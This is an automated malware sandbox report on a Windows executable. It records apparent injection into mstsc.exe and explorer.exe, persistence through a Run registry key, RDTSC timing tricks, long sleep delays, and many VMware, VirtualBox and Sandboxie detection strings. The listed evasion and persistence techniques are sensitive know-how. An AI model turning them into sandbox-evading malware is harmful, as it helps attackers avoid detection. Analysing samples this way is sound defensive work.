          Source: Binary string: mstsc.pdb source: iexplore.exe, 00000001.00000003.1817372482.0000000005440000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818921999.0000000005300000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, 00000001.00000003.1817182020.0000000005308000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000006.00000002.4156356840.0000000000300000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: firefox.pdb source: mstsc.exe, 00000006.00000003.2058101000.0000000006BC6000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: #U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: firefox.pdbP source: mstsc.exe, 00000006.00000003.2058101000.0000000006BC6000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: iexplore.pdbUGP source: explorer.exe, 00000005.00000002.4206940642.000000001148F000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.000000000569F000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4159703931.0000000004DF0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001A8CF000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DD4F000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2060596187.0000000029A0F000.00000004.80000000.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.000000001234F000.00000004.00000001.00040000.00000000.sdmp
          Source: Binary string: gpC:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.CSharp.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: wntdll.pdbUGP source: iexplore.exe, 00000001.00000003.1752125897.000000000331E000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.000000000381E000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000003.1754083552.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1820280873.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.0000000005150000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1818354804.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.00000000052EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbm source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Dynamic.pdb(s source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp, #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbexe source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: mscorlib.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb.Ac source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbion~HC source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Drawing.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb2, T source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.VisualBasic.pdbMZ@ source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbtime@H] source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: iexplore.pdb source: explorer.exe, 00000005.00000002.4206940642.000000001148F000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.000000000569F000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4159703931.0000000004DF0000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001A8CF000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DD4F000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2060596187.0000000029A0F000.00000004.80000000.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.000000001234F000.00000004.00000001.00040000.00000000.sdmp
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: 0xD9A1AC26 [Thu Sep 13 20:27:18 2085 UTC]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0040B05F LoadLibraryW,GetProcAddress,memset,FreeLibrary,6_2_0040B05F
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8BE458 push edi; ret 0_2_00007FFD9B8BE45E
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B00BD pushad ; iretd 0_2_00007FFD9B8B00C1
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B07B5 push eax; ret 0_2_00007FFD9B8B07EB
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8BDC65 push ebp; retf 0_2_00007FFD9B8BDC68
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B9C126C push 30000016h; retn CE3Eh0_2_00007FFD9B9C16B9
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B9C060B push esp; retf 4810h0_2_00007FFD9B9C06B2
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90FB1E push esp; retn 0000h5_2_0E90FB1F
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90FB02 push esp; retn 0000h5_2_0E90FB03
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90F9B5 push esp; retn 0000h5_2_0E90FAE7
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAB19B5 push esp; retn 0000h5_2_0FAB1AE7
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAB1B02 push esp; retn 0000h5_2_0FAB1B03
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAB1B1E push esp; retn 0000h5_2_0FAB1B1F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00419064 push ecx; ret 6_2_00419077
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051527FA pushad ; ret 6_2_051527F9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_05151368 push eax; iretd 6_2_05151369
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0515225F pushad ; ret 6_2_051527F9

          Boot Survival

          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
          Source: C:\Windows\SysWOW64\mstsc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run N2K8UFW
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003300AA IsIconic,GetWindowPlacement,GetLastError,6_2_003300AA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003360E0 LoadCursorW,SetCursor,DefWindowProcW,IsIconic,memset,GetTitleBarInfo,GetCursorPos,6_2_003360E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00330150 IsIconic,GetWindowPlacement,GetLastError,IsZoomed,SetWindowPlacement,GetLastError,SetWindowPos,SetWindowPos,GetClientRect,MoveWindow,6_2_00330150
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00335355 GetWindowRect,GetWindowLongW,GetWindowLongW,IntersectRect,MoveWindow,IsIconic,GetWindowPlacement,6_2_00335355
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0033342A IsZoomed,IsIconic,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,6_2_0033342A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00334630 lstrcmpW,LockWindowUpdate,IsIconic,GetWindowPlacement,GetWindowLongW,SetWindowLongW,SetWindowLongW,VariantInit,VariantClear,VariantClear,GetRgnBox,OffsetRgn,VariantClear,ShowWindow,SetWindowPos,SetWindowPos,SetWindowRgn,LockWindowUpdate,6_2_00334630
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0032D66C IsIconic,GetWindowPlacement,GetWindowRect,6_2_0032D66C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00332687 DefWindowProcW,IsIconic,GetClientRect,GetLastError,VariantClear,DefWindowProcW,6_2_00332687
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0033587D IsWindowVisible,IsIconic,6_2_0033587D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0039C997 GetWindowRect,IsWindow,IsIconic,GetSystemMetrics,GetSystemMetrics,GetWindowRect,PtInRect,PtInRect,SystemParametersInfoW,CopyRect,SetWindowPos,6_2_0039C997
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0036BCF0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_0036BCF0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara matchFile source: Process Memory Space: #U0426#U0438#U0442#U0430#U0442#U0430.exe PID: 7532, type: MEMORYSTR
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 2F99904 second address: 2F9990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 2F99B6E second address: 2F99B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeMemory allocated: 21CCE320000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeMemory allocated: 21CE7F50000 memory reserve | memory write watch
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9828
          Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 3115
          Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 6540
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI coverage: 1.5 %
          Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 0.6 %
          Source: C:\Windows\explorer.exe TID: 4956Thread sleep time: -19656000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4956Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 7916Thread sleep count: 3115 > 30
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 7916Thread sleep time: -6230000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 7916Thread sleep count: 6540 > 30
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 7916Thread sleep time: -13080000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003626C7 PathFindFileNameW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,PathAppendW,FindNextFileW,FindClose,6_2_003626C7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003880BE GetSystemInfo,6_2_003880BE
          Source: Amcache.hve.4.drBinary or memory string: VMware
          Source: explorer.exe, 00000005.00000003.3105602905.000000000CB14000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 4f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: explorer.exe, 00000005.00000002.4184525371.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4184525371.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3497000598.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.000000000982D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D338000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4160624814.0000000003157000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4160624814.000000000313F000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
          Source: explorer.exe, 00000005.00000000.1767281490.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000857000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWundaryDn$
          Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.4.drBinary or memory string: vmci.sys
          Source: explorer.exe, 00000005.00000002.4165873978.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.1767281490.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
          Source: explorer.exe, 00000005.00000002.4165873978.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000005.00000002.4184525371.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: Amcache.hve.4.drBinary or memory string: VMware20,1
          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
          Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000005.00000003.3497000598.0000000009672000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000005.00000002.4157091607.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: explorer.exe, 00000005.00000002.4189289247.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
          Source: explorer.exe, 00000005.00000002.4157091607.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000005.00000002.4165873978.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp/4]
          Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: msedge.exe, 00000021.00000002.2247156636.0000022408443000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000023.00000002.2327431249.0000015D32243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000005.00000002.4184525371.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000005.00000002.4165873978.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000005.00000002.4189289247.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000005.00000000.1771305447.000000000CB15000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
